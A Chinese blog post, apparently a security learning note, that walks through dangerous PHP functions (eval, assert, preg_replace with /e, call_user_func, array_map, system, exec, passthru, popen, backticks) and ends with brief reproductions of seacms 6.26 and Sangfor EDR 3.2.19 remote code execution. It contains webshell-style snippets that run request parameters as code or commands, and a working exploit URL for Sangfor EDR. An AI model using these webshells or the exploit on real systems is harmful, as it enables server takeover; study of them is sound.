PHP危险函数及漏洞复现

最新推荐文章于 2025-10-15 18:10:28 发布
原创 最新推荐文章于 2025-10-15 18:10:28 发布 · 1k 阅读 · 2 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#php

部署运行你感兴趣的模型镜像

危险函数

eval 语句:

eval 会将符合php语法规范字符串当作php代码执行,能够实现简单的一句话木马,列如:

 但这里我们用Feng来进行中国菜刀连接。

连接成功之后如下

能直接对对方服务器进行任何控制,

assert()

assert()同样会将字符串当做PHP 代码来执行。

在网页中通过hackbar来操作,是可以执行系统命令,如下图

 preg_replace()

这个函数的作用是对字符串进行正则匹配后替换,列如下图:

 preg_replace('$c$','C','aabbccdd')中,$c$是对最后字符串中的c进行查找,而'C'则是在查找的基础上将找到的小写c替换成大写C。

 这个函数在当$pattern$处,存在e修饰符时,$reqlacement的值会被当成PHP代码来执行。列如下:

 在上述命令中,\\是一个转义字符,.*则就是当前(也就是括号里)。运行结果如下:

让我们换条命令:

 

<meta charset = "utf-8">
<?php 

//$qwe = empty($_REQUEST['code'])?'phpinfo();':$_REQUEST['code'];
//assert($qwe);

//$str = preg_replace('$c$','C','aabbccdd');
$str = preg_replace('=\[(.*)\]=e','$1','[system(ipconfig)]');
echo "替换后结果为:{$str}";
?>

call_user_func()

回调函数 ,一个函数调用另外一个函数。

call_user_func('system','ipconfig');

 第一个参数是被调用函数的函数名,第二个参数是被调用的函数参数。结果如下图:

array_map()

同样也是一个回调函数。

 这里构造函数,通过array_map来调用,在调用的时候array_map会报错

 表示第二给参数应该是个数组,所有需要在第二个函数后加[],来表示。通过hackbar来修改。

$code = empty($_REQUEST['code'])?'assert':$_REQUEST['code'];
$para[] = empty($_REQUEST['para'])?'phpinfo()':$_REQUEST['para'];

array_map($code,$para);

动态函数

OS 命令执行函数

system()能够将字符串作为OS 命令执行

$cmd = empty($_REQUEST['cmd'])?'ipconfig':$_REQUEST['cmd'];
system($cmd);

exec()

函数能将字符串作为OS 命令执行。

 但传参为ipconfig

就只显示最后一行了,

shell_exec()

 相比于shell_exec比exec显示更加全面。

passthru()

将字符串当做系统命令执行。自带输出功能.



$cmd = empty($_REQUEST['cmd'])?'ipconfig':$_REQUEST['cmd'];
passthru($cmd);

 popen()

$cmd = empty($_REQUEST['cmd'])?'whoami':$_REQUEST['cmd'];
$f = popen($cmd, 'r');
echo fread($f, 4096);

 popen的返回结果为打开文件的字节流,相当打开一个文件,当信息放进去。

 

反引号

反引号` 内的字符串,会被解析成OS 命令。

seacms_6.26_rce漏洞浮现

sangfor_edr_3.2.19_rce漏洞浮现

越权

在url后追加user=admin,即可实现任意用户登录。

 

在url  http://*.*.*.*后追加/tool/log/c.php

 在上面url基础上追加?strip_slashes=system&host=whoami

 漏洞复现。

 

您可能感兴趣的与本文相关的镜像

ACE-Step

ACE-Step

音乐合成
ACE-Step

ACE-Step是由中国团队阶跃星辰(StepFun)与ACE Studio联手打造的开源音乐生成模型。 它拥有3.5B参数量,支持快速高质量生成、强可控性和易于拓展的特点。 最厉害的是,它可以生成多种语言的歌曲,包括但不限于中文、英文、日文等19种语言

Feng_Blue_
关注
ecshop漏洞复现分析
计算机毕业论文源码,学生个人网页制作html源码。贴近用户做网络推广和互联网优化。
10-17 1684
ECShop是一款B2C独立网店系统,适合企业及个人快速构建个性化网上商店。系统是基于PHP语言及MYSQL数据库构架开发的跨平台开源程序。 ecshop漏洞复现分析我看seebug上关于它的漏洞有好多。 xianzhi-2017-02-82239600(SQL注入/远程代码执行) 该漏洞影响ECShop 2.x和3.x版本,是一个典型的“二次漏洞”,通过user.php文件中display()函数的模板变量可控,从而造成SQL注入漏洞,而后又通过SQL注入漏洞将恶意代码注入到危险函数eval中,从而实现了
phpmyadminV4.8.1本地文件包含漏洞复现
seek_2022的博客
07-05 3805
出于学习和技术分享的目的,本文针对phpMyadmin-v4.8.1存在的文件包含漏洞,通过代码审计结合本地搭建测试环境的方式进行漏洞复现研究,以供大家参考学习。
PHP代码函数的执行漏洞
知足且坚定,温柔且上进
04-07 2082
eval函数 eval()函数可以将参数中的变量值执行,通常处于处理模板和动态加载PHP代码,但也常常被攻击者利用,比如一句话后门程序: <?php eval($_GET[cmd])?> assert()函数 assert()函数PHP中用来判断一个表达式是否成立,返回真或假。如果直接将PHP代码传入也会被执行。 <?php assert($_GET["cmd"]);?&g...
漏洞知识点《一句话木马》
qq_46143339的博客
03-18 2798
代码,常用于渗透攻击中获取服务器控制权。服务器完全暴露给攻击者,可执行任意系统命令,导致数据泄露、服务瘫痪、横向渗透等严重后果。是 PHP 中一个危险函数,它将字符串作为 PHP 代码直接执行。是语言结构而非函数,需通过扩展(如 Suhosin)彻底禁用。通过 HTTP POST 请求向服务器发送。并返回当前用户权限信息,实现远程控制。攻击者可通过此参数动态控制服务器行为。攻击者可向服务器发送携带恶意代码的。是 PHP 语言中一种典型的。参数,其内容会作为代码注入到。的值会被解析为代码并执行。
PHP eval函数深层代码执行背后的黑科技
最新发布
Aa211223的博客
10-15 268
美国1月Switch游戏销量TOP10:《大金刚 回归》夺冠
浅谈RCE漏洞
qi_SJQ_的博客
01-23 882
命令执行漏洞(RCE) 漏洞形成原理: 程序代码输入或输出是控制不严格,导致用户可以构造包含恶意命令或代码的函数在服务器上执行。(发生在应用程序逻辑层上) 该漏洞可分为以下两种: 远程命令执行 ping 远程代码执行 evel 新的改变 我们对Markdown编辑器进行了一些功能拓展与语法支持,除了标准的Markdown编辑器功能,我们增加了如下几点新功能,帮助你用它写博客: 全新的界面设计 ,将会带来全新的写作体验; 在创作中心设置你喜爱的代码高亮样式,Markdo
禁止不安全的php函数(php.ini)
huike008的博客
12-29 859
为了使php程序更安全,很多站长都选择了禁用一些比较敏感的函数,那影响php安全的函数到底有哪些呢,下面我们列出了一些:1、phpinfo() 功能描述:输出 PHP 环境信息以及相关的模块、WEB 环境等信息。 危险等级:中2、passthru() 功能描述:允许执行一个外部程序并回显输出,类似于 exec()。 危险等级:高3、exec() 功能描述:允许执行一个外部程序(如 UNI...
代码审计——常见漏洞审计之php危险函数总结
爱国小白帽
04-24 1856
代码执行 执行代码函数eval() assert() preg_replace() create_function() array_map() call_user_func() call_user_func_array() array_filter usort uasort() 命令执行 命令执行函数: system() exec() shell_exec() passthru() ...
漏洞复现篇——PHP反序列化漏洞
爱国小白帽
02-28 4646
简介 PHP反序列化漏洞也叫PHP对象注入,是一个非常常见的漏洞,这种类型的漏洞虽然有些难以利用,但一旦利用成功就会造成非常危险的后果。漏洞的形成的根本原因是程序没有对用户输入的反序列化字符串进行检测,导致反序列化过程可以被恶意控制,进而造成代码执行、getshell等一系列不可控的后果。反序列化漏洞并不是PHP特有,也存在于Java、Python等语言之中,但其原理基本相通。 什么是序列化和...
精选资源
web安全程序设计大作业漏洞复现及修复
07-05
**XSS漏洞复现案例分析** - **实验环境准备**: - 安装**PHPStudy**:搭建本地服务器环境,配置好PHP环境。 - 解压**xss-labs-master**靶场到WWW目录:用于复现XSS攻击。 - 使用**Navicat**管理数据库:便于...
xhcms v1.0漏洞复现
weixin_44087538的博客
09-03 1589
文件包含函数中存在变量,可能存在文件包含漏洞 /index.php include('files/'.$action.'.php');//载入相应文件php//单一入口模式//关闭错误显示//接收文件名//判断为空或者等于index//载入相应文件?这里直接将GET接收到的r参数,使用addslashes()转义,然后赋值给$action,但没有对$action进行充分的验证。因为GET传进来的r参数是可控的,攻击者可以通过修改URL中的'r'参数来包含任意文件,导致文件包含漏洞
PHP危险函数
杨同学的博客
12-23 1187
php部分危险函数
PHP 危险函数
2301_79118231的博客
10-31 434
注:个人笔记,并不详细,仅供参考。PHP 中有一些函数是比较危险的,也是进行PHP 代码审计的时候需要重点关注的内容。a。
[后端代码审计] PHP 危险函数
Da1NtY的博客
08-09 1610
PHP 中有一些函数是比较危险的,也是进行PHP代码审计需要重点关注的内容
PHP代码审计之危险函数
weixin_44300286的博客
08-24 900
前言: 前几天总结了一下命令执行漏洞和代码执行漏洞,在其中发现了一些危险函数,其实危险函数还有很多,今天就来总结一下,之前总结过的就一笔带过,着重写之前没总结过的 0x02 代码执行函数 1.1 eval 函数 eval函数可以把字符串当作php代码来执行,最常见的操作就是一句话木马: <?php @eval($_POST['ps']);?> 1.2 assert函数 assert函...
mysql的危险函数_php危险函数
weixin_35427210的博客
02-05 509
RCE, Remote Code/Command Excuite(远程 代码/命令 执行) 危险函数phpinfo()1、查看当前php配置信息,可以被攻击者用来进行弱点信息搜集2、phpinfo也是常用于检验代码执行漏洞是否存在的命令eval()把字符串当做PHP代码执行,意味着只要控制了eval函数的所计算的变量,就能在目标机器上实现任意代码执行。一般来说eval都会被禁掉assert()初学...
php危险函数总结
我是齐潇啊
03-28 5674
php危险函数笔记总结以及实操结果
PHP危险函数总结
Lemon's blog
08-17 4171
前言:PHP中有很多危险函数,如phpinfo() ,这次就来详细总结一下PHP中的危险函数,方便以后学习。 一、PHP代码执行函数 eval()函数 定义和用法: eval() 函数把字符串按照 PHP 代码来计算. 该字符串必须是合法的 PHP 代码,且必须以分号结尾。 这个用法就会产生漏洞,通过一个例子来看一下: <?php $var = "var"; if (isset($_GE...
Php反序列化漏洞复现
02-06
### PHP反序列化漏洞复现 为了理解PHP反序列化漏洞的工作机制,下面提供了一个详细的实例来展示如何复现这一类安全问题。 #### 创建易受攻击的代码环境 假设存在一个简单的PHP类`User`,该类具有公开属性以及魔术...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值